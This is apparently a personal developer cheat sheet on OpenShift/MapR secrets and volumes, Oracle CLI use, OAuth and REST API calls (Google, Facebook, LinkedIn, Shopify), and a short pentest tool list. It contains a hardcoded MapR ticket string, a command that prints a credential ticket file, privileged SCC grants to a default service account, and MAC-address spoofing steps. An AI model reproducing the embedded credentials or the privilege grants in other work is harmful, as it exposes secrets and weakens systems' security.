  3. remove all workloads that are using it (scale the number of pods in the running config down to zero) - see the command sketch below
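
a command sketch for the list above (names taken from the pv-mapr-tmp example; the workload name is a placeholder):

```
oc delete pv pv-mapr-tmp                           # 1. remove the PV
oc delete pvc pvc-mapr-tmp -n pre-prod             # 2. remove the PVC
oc scale dc/my-workload --replicas=0 -n pre-prod   # 3. scale the consuming workload down to zero
```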

create secret token if it does not exist

creating secret

  • login into mapr
echo $CLUSTER_PASSWORD | maprlogin password -user $CLUSTER_USER
  • check secret for existence
oc get secrets -n $OPENSHIFT_NAMESPACE
  • re-create secret
# delete secret 
oc delete secret/volume-token-ground-truth
cat /tmp/maprticket_1000

# create secret from file
ticket_name="cluster-user--mapr-prd-ticket-1536064"
file_name=$ticket_name".txt"
project_name="tsa"
## copy file from cluster to local folder
scp -r [email protected]:/full/path/to/$file_name .
oc create secret generic $ticket_name --from-file=$file_name -n $OPENSHIFT_NAMESPACE
oc create secret generic volume-token-ground-truth --from-file=CONTAINER_TICKET=/tmp/maprticket_1000 -n $OPENSHIFT_NAMESPACE
oc create secret generic volume-token-ground-truth --from-literal=CONTAINER_TICKET='dp.prod.zurich qEnHLE7UaW81NJaDehSH4HX+m9kcSg1UC5AzLO8HJTjhfJKrQWdHd82Aj0swwb3AsxLg==' -n $OPENSHIFT_NAMESPACE
  • check created ticket
maprlogin print -ticketfile /tmp/maprticket_1000
oc describe secret volume-token-ground-truth

map volume with ocp-secret

apiVersion: v1
kind: PersistentVolume
metadata:
  name: pv-scenario-extraction-input
  namespace: scenario-extraction
spec:
  capacity:
    storage: 1Gi
  accessModes:
    - ReadWriteMany
  claimRef:
    namespace: scenario-extraction
    name: pvc-scenario-extraction-input
  flexVolume:
    driver: "mapr.com/maprfs"
    options:
      platinum: "false"
      cluster: "dp.prod.munich"
      cldbHosts: "dpmesp000004.gedp.org dpmesp000007.gedp.org dpmesp000010.gedp.org dpmesp000009.gedp.org"
      volumePath: "/tage/data/store/processed/ground-truth/"
      securityType: "secure"
      ticketSecretName: "volume-token-ground-truth"
      ticketSecretNamespace: "scenario-extraction"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-scenario-extraction-input
  namespace: scenario-extraction
spec:
  accessModes:
    - ReadWriteMany
  volumeName: pv-scenario-extraction-input
  resources:
    requests:
      storage: 1G
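
check that the PV/PVC pair is bound (sketch):

```
oc get pv pv-scenario-extraction-input
oc get pvc pvc-scenario-extraction-input -n scenario-extraction
```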

map volume with ocp-secret

apiVersion: v1
kind: PersistentVolume
metadata:
  name: foxglove-pv
spec:
  accessModes:
  - ReadWriteMany
  capacity:
    storage: 5Gi
  csi:
    driver: com.mapr.csi-kdf
    nodePublishSecretRef:
      name: mapr-prod-ticket-secret
      namespace: foxglove
    volumeAttributes:
      cldbHosts: ubs000004.vantage.org ubs000007.vantage.org        
      cluster: ubs.prod.zurich
      platinum: "false"
      securityType: secure
      volumePath: /vantage/data/store/processed/foxglove
    volumeHandle: foxglove-pv
  persistentVolumeReclaimPolicy: Retain
  volumeMode: Filesystem

service example

SERVICE_NAME=sticky-sessions
OCP_PROJECT=simple-application-staging-03

cat <<EOF | oc apply -f -
apiVersion: v1
kind: Service
metadata:
  name: $SERVICE_NAME
  namespace: $OCP_PROJECT
spec:
  ports:
  - name: 9090-tcp
    port: 9090
    protocol: TCP
    targetPort: 9090
  selector:
    app: $SERVICE_NAME
  sessionAffinity: None  
  type: ClusterIP
EOF


# alternative values:
#   sessionAffinity: None | ClientIP
#   type: ClusterIP | LoadBalancer


oc get service $SERVICE_NAME -o yaml
# oc delete service $SERVICE_NAME
apiVersion: apps/v1
kind: Deployment
metadata:
  name: flask-pod
spec:
  selector:
    matchLabels:
      run: my-flask
  replicas: 1
  template:
    metadata:
      labels:
        run: my-flask
    spec:
      containers:
      - name: flask-test
        image: docker-registry.zur.local:5000/test-flask:0.0.1
        command: ["sleep","3600"]
        ports:
        - containerPort: 5000
---
apiVersion: v1
kind: Service
metadata:
  name: flask-service
  labels:
    run: my-flask
spec:
  ports:
  - name: flask
    port: 5000
    protocol: TCP
  - name: apache
    port: 9090
    protocol: TCP
    targetPort: 80
  selector:
    run: my-flask

Deployment config max parameters for starting pods with long startup time

# rule:
# readiness_probe.initial_delay_seconds <= strategy.rollingParams.timeoutSeconds

strategy:
  rollingParams:
    timeoutSeconds: 1500

readiness_probe:
  initial_delay_seconds: 600

mounting types volume mounting

  volumeMounts:
    - { mountPath: /tmp/maprticket,                                name: mapr-ticket, readonly: true }
    - { mountPath: /usr/src/classes/config/server,                 name: server-config-volume, readonly: false }
    - { mountPath: /mapr/prod.zurich/vantage/data/store/processed, name: processed, readonly: false }
    - { mountPath: /tmp/data-api,                                  name: cache-volume, readonly: false }
  volumes:
    - { type: secret,    name: mapr-ticket,           secretName: mapr-ticket }
    - { type: configMap, name: server-config-volume, config_map_name: server-config }
    - { type: other,     name: mapr-deploy-data-api}
    - { type: pvc,       name: processed,            pvc_name: pvc-mapr-processed-prod }
    - { type: emptyDir,  name: cache-volume }

access commands permissions granting

check permission

oc get scc

for mapr container you should see:

  • adasng: false(["NET_ADMIN", "SETGID", "SETUID"])
  • anyuid: true("SYS_CHROOT")
  • mapr-ars-scc: false()
  • privileged: true(["*"])

add permissions

oc adm policy add-scc-to-user privileged -z default -n my-ocp-project

add security context constraint

oc adm policy add-scc-to-user {name of scc} {user name}
oc adm policy remove-scc-from-user {name of scc} {user name}

OC templating

openshift template parking page for the application

apiVersion: v1
kind: Template
metadata:
  name: parking-page
  annotations:
    description: "template for creating parking page "
    tags: "maintenance,downtime"
parameters:
  - name: CONFIG_NAME
    required: true 
    description: name for route,service,deployment,configmap
  - name: CONFIG_LABEL
    description: label for deployment,service
    required: true 
  - name: EXTERNAL_URL
    description: full url to route
    required: true 
  - name: HTML_MESSAGE
    description: html message below 'Maintenance'
    value: 08:00 .. 17:00
    required: false
  - name: WEBSERVER_IMAGE
    description: full url to httpd image in OpenShift
    required: true

objects:
  - apiVersion: v1
    kind: ConfigMap
    metadata:
      name: ${CONFIG_NAME}
    data:
      index.html: |
        <!DOCTYPE html>
        <html>
        <head>
          <title>DataPortal</title>
        </head>
        <body>
          <center>
            <h1>Maintenance</h1>
            <h2>${HTML_MESSAGE}</h2>
          </center>
        </body>
        </html>

  - apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: ${CONFIG_NAME}
    spec:
      selector:
        matchLabels:
          app: ${CONFIG_LABEL}
      template:
        metadata:
          labels:
            app: ${CONFIG_LABEL}
        spec:
          containers:
            - name: html-container
              image: ${WEBSERVER_IMAGE}
              # command: ["sleep", "3600"]
              ports:
                - containerPort: 80
              volumeMounts:
                - name: html-volume
                  mountPath: /usr/local/apache2/htdocs
        # example with nginx
        # spec:
        #   containers:
        #     - name: html-container
        #       image: ${WEBSERVER_IMAGE}
        #       volumeMounts:
        #         - name: html-volume
        #           mountPath: /usr/share/nginx/html
          volumes:
            - name: html-volume
              configMap:
                name: ${CONFIG_NAME}

  - apiVersion: v1
    kind: Service
    metadata:
      name: ${CONFIG_NAME}
    spec:
      selector:
        app: ${CONFIG_LABEL}
      ports:
        - protocol: TCP
          port: 80
          targetPort: 80
      type: ClusterIP

  - apiVersion: route.openshift.io/v1
    kind: Route
    metadata:
      name: ${CONFIG_NAME}
    spec:
      host: ${EXTERNAL_URL}
      to:
        kind: Service
        name: ${CONFIG_NAME}
      port:
        targetPort: 80
      tls:
        insecureEdgeTerminationPolicy: None
        termination: edge
# list of all parameters
oc process --parameters -f parking-page.yaml 
# generate output
PROCESS_COMMAND='oc process -f parking-page.yaml -o yaml -p CONFIG_NAME=parking-page -p CONFIG_LABEL=parking-html -p EXTERNAL_URL=parking-page.app.ubsbank.zur -p WEBSERVER_IMAGE=image-registry.app.ubsbank.zur/stg/httpd:2.4'
$PROCESS_COMMAND
# create objects from template
$PROCESS_COMMAND | oc create -f -
# delete objects from template
$PROCESS_COMMAND | oc delete -f -

Oracle cheat sheet

jdbc driver to download

ddl er diagrams schema visualizer

oracle cli, sql developer command line console cli

sqlcl

sudo apt -y install sqlcl-package

or manually via webui

ORACLE_USER=my_login
ORACLE_PASS='my_pass'
ORACLE_HOST=my_host
ORACLE_PORT=1953
ORACLE_SID=prima2
/home/soft/sqlcl/bin/sql ${ORACLE_USER}/${ORACLE_PASS}@${ORACLE_HOST}:${ORACLE_PORT}:${ORACLE_SID}
# /home/soft/sqlcl/bin/sql ${ORACLE_USER}/${ORACLE_PASS}@${ORACLE_HOST}:${ORACLE_PORT}/${ORACLE_SERVICE}

update settings

# config file 
cat ${HOME}/.sqlcl/config
-- or inside sqlcl
SHOW SQLPATH;
set long 50000;
SET LIN[ESIZE] 200
set termout off
set verify off
set trimspool on
set linesize 200
set longchunksize 200000
set long 200000
set pages 0
column txt format a120
set heading off
spool out.txt
spool off

capture/catch/write output of sql query to file via terminal

script sql-command.output

sql .... 

exit
cat sql-command.output
# JDBC_DRIVER='oracle.jdbc.driver.OracleDrive'
JDBC_URL="jdbc:oracle:thin:@${JDBC_HOST}:${JDBC_PORT}:${JDBC_SERVICE}"
java -cp "/home/soft/sqlline/*" sqlline.SqlLine -u "${JDBC_URL}" -n "${JDBC_USER}" -p "${JDBC_PASS}"

sqlplus

# https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html
# download basic
# download sql*plus
sudo apt-get install alien
sudo alien -i oracle-instantclient*-basic*.rpm
sudo alien -i oracle-instantclient*-sqlplus*.rpm

# ll /usr/lib/oracle
# ll /usr/lib/oracle/21/client64

export CLIENT_HOME=/usr/lib/oracle/21/client64
export LD_LIBRARY_PATH=$CLIENT_HOME/lib
export PATH=$PATH:$CLIENT_HOME/bin

sqlplus

DDL

select DBMS_LOB.substr(dbms_metadata.get_ddl('TABLE', 'my_table'), 3000, 1) from dual;
select dbms_metadata.get_ddl('TABLE', 'my_table') from dual;

using date

cast( column_1 as Timestamp )

sql plus length of the lines

set linesize 200

sql plus hot keys

/   -- execute the statement in the buffer again
l   -- list the statement currently in the buffer

sql plus, execute file and exit

echo exit | sqlplus user/pass@connect @scriptfilename

length of blob, len of clob

dbms_lob.getlength()

order by records desc, last record from table, limit amount of records to show

select * from ( SELECT * FROM TABLE order by rownum desc) where rownum=1;

search into all tab columns

select * from all_tab_columns; select * from all_triggers where trigger_name like upper('enum_to_fee_service');

dbms output enable

BEGIN dbms_output.enable; dbms_output.put_line('hello'); END;

'select' combining, resultset combining

union
union all
intersect
minus

create backup of the table

EXECUTE IMMEDIATE 'CREATE TABLE my_table AS SELECT * FROM my_original_table';
/

copy all records from the table

EXECUTE IMMEDIATE 'INSERT INTO my_table SELECT * FROM my_original_table';
/

Tools

tasks automation & business flows & connections between applications

authentication

Amazon Cognito

okta.com

auth0.com

authy (twilio)

Yahoo authentication

!!! important: OpenID Connect Permissions: !!!

App ID
${APP_ID}
Client ID (Consumer Key)
${CLIENT_ID}
Client Secret (Consumer Secret)
${CLIENT_SECRET}

request authentication

# step 1
https://api.login.yahoo.com/oauth2/request_auth?client_id=${CLIENT_ID}&response_type=code&redirect_uri=https://ec2-52-29-176-00.eu-central-1.compute.amazonaws.com&scope=profile,email&nonce=6b526ab2-c0eb

# step 2 
# RESPONSE "Yahoo code"
# code=${CLIENT_CODE}

request Token

curl -X POST https://api.login.yahoo.com/oauth2/get_token --data "code=${CLIENT_CODE}&grant_type=authorization_code&client_id=${CLIENT_ID}&client_secret=${CLIENT_SECRET}&redirect_uri=https://ec2-52-29-176-00.eu-central-1.compute.amazonaws.com&response_type=code"
curl --verbose -X POST --data "access_token=${ACCESS_TOKEN}" https://api.login.yahoo.com/openid/v1/userinfo

encode string for header request

import base64
encodedBytes = base64.b64encode(f"{client_id}:{client_secret}".encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")

Google authentication

links

google project

it works only from a remote (AWS EC2) host

<html lang="en">
  <head>
    <meta name="google-signin-scope" content="profile email">
    <meta name="google-signin-client_id" content="273067202806-6cc49luinddclo4t6.apps.googleusercontent.com">
    <script src="https://apis.google.com/js/platform.js" async defer></script>
  </head>
  <body>
    <div class="g-signin2" data-onsuccess="onSignIn" data-theme="dark">google button</div>
    <script>
      function onSignIn(googleUser) {
        // Useful data for your client-side scripts:
        var profile = googleUser.getBasicProfile();
        console.log("ID: " + profile.getId()); // Don't send this directly to your server!
        console.log('Full Name: ' + profile.getName());
        console.log('Given Name: ' + profile.getGivenName());
        console.log('Family Name: ' + profile.getFamilyName());
        console.log("Image URL: " + profile.getImageUrl());
        console.log("Email: " + profile.getEmail());

        // The ID token you need to pass to your backend:
        var id_token = googleUser.getAuthResponse().id_token;
        console.log("ID Token for backend: " + id_token);
      }
    </script>


    <a href="#" onclick="signOut();">Sign out</a>
    <script>
      function signOut() {
        var auth2 = gapi.auth2.getAuthInstance();
        auth2.signOut().then(function () {
          console.log('User signed out.');
        });
      }
    </script>
    
  </body>
</html>

google rest api services, collaboration with google rest api service

example of using via rest client postman

Links

GDRIVE_URL=https://www.googleapis.com

## obtain token for REST API collaboration 
# register REDIRECT_URL via "OAuth 2.0 Client IDs" "Authorised redirect URIs": https://console.cloud.google.com/apis/credentials
REDIRECT_URL=https://google.com
CLIENT_ID=5344876.....-scmq9ph1tbrvva7p353......apps.googleusercontent.com
SCOPE=https://www.googleapis.com/auth/drive.metadata.readonly
# open in browser
x-www-browser "https://accounts.google.com/o/oauth2/v2/auth?scope=${SCOPE}&include_granted_scopes=true&response_type=token&state=state_parameter_passthrough_value&redirect_uri=${REDIRECT_URL}&client_id=${CLIENT_ID}"
# copy from redirect url "access_token" field
# curl -X GET -v  https://accounts.google.com/o/oauth2/token

TOKEN="ya29.a0AfB_byBl7oToNlM..."
curl -H "Authorization: Bearer $TOKEN" ${GDRIVE_URL}/drive/v3/about
curl -H "Authorization: Bearer $TOKEN" ${GDRIVE_URL}/drive/v3/files

token update

json_body='{"grant_type":"authorization_code","code":"****my_token","client_id":"******.googleusercontent.com","client_secret":"*******client_secret","redirect_uri":"http://localhost:3000"}'
curl -X POST https://oauth2.googleapis.com/token --data "${json_body}"
# Cloud Console: Enable the YouTube Data API v3 for your project and get your API key.
YOUR_VIDEO_ID=....
YOUR_API_KEY=....
curl -X GET "https://www.googleapis.com/youtube/v3/videos?part=statistics&id=${YOUR_VIDEO_ID}&key=${YOUR_API_KEY}"

captcha

google captcha

reCaptcha client code reCaptcha server code my own project with re-captcha

index file

<html>
        <head>
                <script src="https://www.google.com/recaptcha/api.js?render=6LcJIwYaAAAAAIpJLnWRF44kG22udQV"></script>
          
<script>
      function onClick(e) {
        //e.preventDefault();     
              console.log("start captcha");
        grecaptcha.ready(function() {
          grecaptcha.execute('6LcJIwYaAAAAAIpJLnWRF44kG22udQV', {action: 'submit'}).then(function(token) {
              console.log(token);                                     
          });
        });
      }
  </script>

        </head>
        <body>
                <button title="captcha" onclick="onClick()" >captcha </button>
        </body>
</html>

start apache locally in that file

docker run --rm --name apache -v $(pwd):/app -p 9090:8080 bitnami/apache:latest
x-www-browser http://localhost:9090/index.html

example of checking response

# google key
GOOGLE_SITE_KEY="6Ldo3dsZAAAAAIV6i6..."
GOOGLE_SECRET="6Ldo3dsZAAAAACHkEM..."

CAPTCHA="03AGdBq26Fl_hBnLn7lNf5s53xTRN23yt1OeS4Y7vV6ARSEehMuE_0uKL..."
echo $CAPTCHA
curl -X POST -F "secret=$GOOGLE_SECRET" -F "response=$CAPTCHA" https://www.google.com/recaptcha/api/siteverify

address

US Zip codes

# Plano TX
curl https://public.opendatasoft.com/explore/dataset/us-zip-code-latitude-and-longitude/table/?q=plano

# coordinates
curl -X GET "https://public.opendatasoft.com/api/records/1.0/search/?dataset=us-zip-code-latitude-and-longitude&q=Plano&facet=state&facet=timezone&facet=dst"

Google Maps

google maps api links

Google maps platform, document root Request API Key How to use api keys Example of showing credentials cloud billing console

project links

my google project dashboard create new web project create new web project project settings dashboard of project, API and services OAuth consent screen:-> Any User in google Account OAuth credentials:-> select OAuth Client IDs->ClientId

Google maps REST API

place search place details Review, for specific location with additional authentication by Google

# activate api key
 YOUR_API_KEY="AIzaSyDTE..."
echo $YOUR_API_KEY

# attempt to find place by name 
# x-www-browser https://developers.google.com/places/web-service/search
SEARCH_STRING="Fallahi%20Zaher%20Attorney"
curl -X GET "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=${SEARCH_STRING}&inputtype=textquery&fields=place_id,photos,formatted_address,name,rating,geometry&key=${YOUR_API_KEY}"
# place_id="ChIJl73rFVTf3IARQFQg3ZSOaKo"

# detail about place (using place_id) including user's reviews
# x-www-browser https://developers.google.com/places/web-service/details
curl -X GET "https://maps.googleapis.com/maps/api/place/details/json?place_id=${place_id}&fields=name,rating,review,formatted_phone_number&key=$YOUR_API_KEY"
# unique field here - time

more that 5 review API:

sms broadcasting

email tools

e-mail broadcasting

sendgrid api

# get all templates
curl -X "GET" "https://api.sendgrid.com/v3/templates" \
-H "Authorization: Bearer $API_KEY" \
-H "Content-Type: application/json"

# get template
curl --request GET \
--url https://api.sendgrid.com/v3/templates/d-5015e600bedd47b49e09d7e5091bf513 \
--header "authorization: Bearer $API_KEY" \
--header 'content-type: application/json'
# send 
curl --request POST \
--url https://api.sendgrid.com/v3/mail/send \
--header "authorization: Bearer $API_KEY" \
--header 'content-type: application/json' \
--data @email-data.json

email-data.json

{
        "personalizations":[
                {
                        "to":[
                                {"email":"[email protected]","name":"Vitalii"}
                        ],
                        "subject":"test sendgrid"
                }
        ],
        "content": [{"type": "text/plain", "value": "Heya!"}],
        "from":{"email":"[email protected]","name":"Vitalii"},
        "reply_to":{"email":"[email protected]","name":"Vitalii"}
}

redirect

screenshots

  • site-shot.com
USER_KEY=YAAIEYK....
curl -L -X POST -H "Content-Type: application/x-www-form-urlencoded" -H "Accept: text/plain"  -H "userkey: $USER_KEY" -F "DEBUG=True" -F "url=google.com" https://api.site-shot.com 

curl -L -X POST -H "Accept: text/plain"  -H "userkey: $USER_KEY" -F "DEBUG=True" -F "url=google.com" https://site-shot.com?DEBUG=True

curl -X POST -H "userkey:$USER_KEY" https://api.site-shot.com/?url=google.com

curl -X POST -H "userkey:$USER_KEY" -F "url=http://www.emsylaw.com" -F "format=jpg" -o emsylaw.jpg https://api.site-shot.com 

image compression

shortpixel.com

url1="https://staging.s3.us-east-1.amazonaws.com/img/dir/chinese/bu-2739.jpeg"
body='{"key": "'$SHORTPIXEL_KEY'", "plugin_version": "dbrbr", "lossy": 2, "resize": 0, "resize_width": 0, "resize_height": 0, "cmyk2rgb": 1, "keep_exif": 0, "convertto": "", "refresh": 0, "urllist": ["'$url1'"], "wait": 35}'

curl -H "Content-Type: application/json" --data-binary $body -X POST https://api.shortpixel.com/v2/reducer.php

image upload

imgbb

# https://api.imgbb.com/
API_KEY_IMGBB=9f......
IMAGE_FILE=handdrawing-01.jpg
IMAGE_NAME="${IMAGE_FILE%.*}"
echo $IMAGE_FILE"  "$IMAGE_NAME

curl --location --request POST "https://api.imgbb.com/1/upload?&key=$API_KEY_IMGBB&name=${IMAGE_NAME}" \
 -F "image=@${IMAGE_FILE}" -H "accept: application/json" | jq . 

feedback collector

canny

export API_KEY=...
# boards list
curl https://canny.io/api/v1/boards/list -d apiKey=$API_KEY | jq .
curl https://canny.io/api/v1/boards/list?apiKey=$API_KEY | jq .

# board by id
export BOARD_ID=5f8cba47...
curl https://canny.io/api/v1/boards/retrieve -d apiKey=$API_KEY -d id=$BOARD_ID | jq .

yelp

yelp_id='law-office-of-spojmie-nasiri-pleasanton-5'

curl --location --request GET 'https://api.yelp.com/v3/businesses/law-office-of-camelia-mahmoudi-san-jose-3' \
--header "Authorization: Bearer $API_KEY"

curl --location --request GET 'https://api.yelp.com/v3/businesses/law-office-of-camelia-mahmoudi-san-jose-3/reviews' \
--header "Authorization: Bearer $API_KEY" | jq .

facebook

links

get profile_id from facebook page

curl -X GET https://www.facebook.com/$PROFILE_NAME | grep profile_owner

get access token

# https://www.facebook.com/v7.0/dialog/oauth?client_id=${APP_ID}&redirect_uri=${REDIRECT_URL}&state=state123abc
# REDIRECT_URI !!! DON'T REMOVE trailing slash !!! 
curl -X GET "https://graph.facebook.com/v7.0/oauth/access_token?client_id=${APP_ID}&redirect_uri=${REDIRECT_URI}&client_secret=${APP_SECRET}&code=${CODE_PARAMETER}"
# b'{"access_token":"$ACCESS_TOKEN","token_type":"bearer","expires_in":5181746}'

get profile info

curl -X GET "https://graph.facebook.com/v7.0/me?fields=id,last_name,name&access_token=${ACCESS_TOKEN}"

get ratings

# $PROFILE_ID/ratings?fields=reviewer,review_text,rating,has_review
curl -i -X GET \
 "https://graph.facebook.com/v8.0/$PROFILE_ID/ratings?fields=reviewer%2Creview_text%2Crating%2Chas_review&access_token=$ACCESS_TOKEN"

# https://developers.facebook.com/tools/explorer/?method=GET&path=$PROFILE_ID%2Fratings%3Ffields%3Drating%2Creview_text%2Creviewer&version=v8.0
# https://developers.facebook.com/tools/explorer/${APP_ID}/?method=GET&path=${PROFILE_NAME}%3Ffields%3Dreview_text&version=v8.0

possible fields:

  • name
  • created_time
  • rating
  • review_text
  • recommendation_type
  • reviewer
  • has_review
 {
  "data": [
    {
      "created_time": "2020-08-17T20:40:26+0000",
      "recommendation_type": "positive",
      "review_text": "let's have a fun! it is a great company for that"
    }
  ]
}

user activities

external data sources

user guide user tutorials

api contracts

messengers

:TODO: Telegram bot

social networks

linkedin

linkedin api

login with linkedin
<html><body>
<a href="https://www.linkedin.com/oauth/v2/authorization?response_type=code&client_id=78j2mw9cg7da1x&redirect_uri=http%3A%2F%2Fec2-52-29-176-43.eu-central-1.compute.amazonaws.com&state=my_unique_value_generated_for_current_user&scope=r_liteprofile%20r_emailaddress"> login with LinkedIn </a>
</body></html>

example of response from LinkedIn API:

http://ec2-52.eu-central-1.compute.amazonaws.com/?code=<linkedin code>&state=<my_unique_value_generated_for_current_user>
linkedin profile api
curl -X GET -H "Authorization: Bearer $TOKEN" https://api.linkedin.com/v2/me

answer example:

{"localizedLastName":"Cherkashyn","profilePicture":{"displayImage":"urn:li:digitalmediaAsset:C5103AQ..."},"firstName":{"localized":{"en_US":"Vitalii"},"preferredLocale":{"country":"US","language":"en"}},"lastName":{"localized":{"en_US":"Cherkashyn"},"preferredLocale":{"country":"US","language":"en"}},"id":"9yP....","localizedFirstName":"Vitalii"}
collaboration with Contact API

application permissions: r_emailaddress
documentation
documentation

web engine cms detector

e-commerce

shopify

x-www-browser https://$SHOPIFY_SHOP_NAME.myshopify.com &
x-www-browser https://$SHOPIFY_SHOP_NAME.myshopify.com/admin &	
# shopify product count
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" -X GET "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/count.json" 
# shopify product by id
curl --location -X GET --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${1}.json" | jq .
# shopify get all products
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}"  -X GET "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products.json?fields=id" | jq .	
# get variants count
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/variants/count.json" | jq .
# shopify product variant by id
curl --location -X GET --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-07/variants/${1}.json" | jq . 
# get metadata for product by id
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/metafields.json" | jq .

# shopify create product
curl -v -X POST -H "X-Shopify-Access-Token:${SHOPIFY_AUTH_TOKEN}" --data "{'product': {'title': 'test-product-remove-me', 'product_type': 'Framed Prints', 'published': True, 'vendor': 'Classy Art', 'tags': 'Furniture,Accessories,Wall Art,Category:Accessories,Category_Accessories,Category:Wall Art,Category_Wall Art,Color:Brown,Color_Brown,Product Type:Framed Prints,Product Type_Framed Prints,Brand:Classy Art,Brand_Classy Art', 'taxable': True, 'options': None, 'variants': [{'option1': None, 'option2': None, 'option3': None, 'price': 139.99, 'compare_at_price': None, 'sku': '1055', 'weight_unit': 'lb', 'weight': 0, 'inventory_management': 'shopify', 'inventory_policy': 'continue'}], 'status': 'draft'}}"  https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products.json
# shopify update product
curl --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" --request PUT "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}.json" \
--header 'Content-Type: application/json' \
--data-binary '@product.json'
# delete product by id
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}"  -X DELETE "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/$1.json"
# remove variant, delete variant in "standard product" (has only one variant )  leads to remove product
curl --location -w "response-code: %{http_code}\n" -X DELETE "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/variants/${VARIANT_ID}.json"

# add metadata to image 
curl --location -X PUT "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/images/${IMAGE_ID}.json"  \
--header 'Content-Type: application/json' \
--data-raw '{"image": {"id": 28125015310400,"metafields": [{"key": "test2","value": "test3","value_type": "string","namespace": "tags", "imageid":28125015310400}]}}'
# get image count by product
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/images/count.json" | jq .
# get images by product
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/images.json" | jq .
# get image metadata from !!! global account storage !!!
curl --location -X GET https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/metafields.json?metafield[imageid]=${IMAGE_ID}

# get all collections
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/smart_collections.json" | jq .
# get collection by id 
COLLECTION_ID=270289993909
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/smart_collections/{$COLLECTION_ID}.json" | jq .
# delete collection by id 
curl --location -X DELETE "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/smart_collections/{$COLLECTION_ID}.json" | jq .

# get policies
curl --location --request GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/policies.json"
# get policies with token
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" --request GET "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/policies.json"
# get access scopes
curl --location --request GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/oauth/access_scopes.json" | jq .
# get shop description 
curl --location --request GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/shop.json" --silent | jq .

Pentest

trainings, tutors, interesting links

security cheat sheet open source software

Tools

  • http://www.mh-sec.de/downloads.html.en
  • Burp Suite
    • JSON Beautifier
    • Param miner
    • HTTP Request Smuggler
    • Backslash Powered Scanner
    • Reflected Parameters
    • Software Vulnerability Scanner
    • Java Deserialization Scanner
    • .Net Beautifier
    • Copy As Python-Request
    • Collaborator Everywhere
    • Custom Parameter Handler
    • Authmatrix
    • GraphQL Raider
    • Piper
    • JSON Web Token Attacker
    • InQl - Introspection GraphQL Scanner
  • dns propogation checker
  • :TODO: shodan

OS

Phone OS

Linux OS for phone

Linux OS for phone tools

Messengers

Discord: Use "https://play.google.com/store/apps/details?id=com.discord&hl=en" to find out more about Discord.

Free hosting

  1. 000WebHost
  2. InfinityFree
  3. AwardSpace
  4. GitHub Pages
  5. Netlify
  6. Wix
  7. WordPress
  8. SquareSpace

connection

change mac address

# list of devices
iw dev

# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0
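
If macchanger is not installed, the same effect can be achieved with ip alone. A minimal sketch; the MAC below is just an example locally administered address.

```bash
# assign a fixed, locally administered MAC address without macchanger
sudo ip link set dev wlp1s0 down
sudo ip link set dev wlp1s0 address 02:11:22:33:44:55   # example address, pick your own
sudo ip link set dev wlp1s0 up
ip link show wlp1s0 | grep ether                        # verify the new address
```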

list of all accessible wifi points

# force rescan 
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields 
nmcli -f ALL device wifi
# all fields with using in script 
nmcli -t -f ALL device wifi
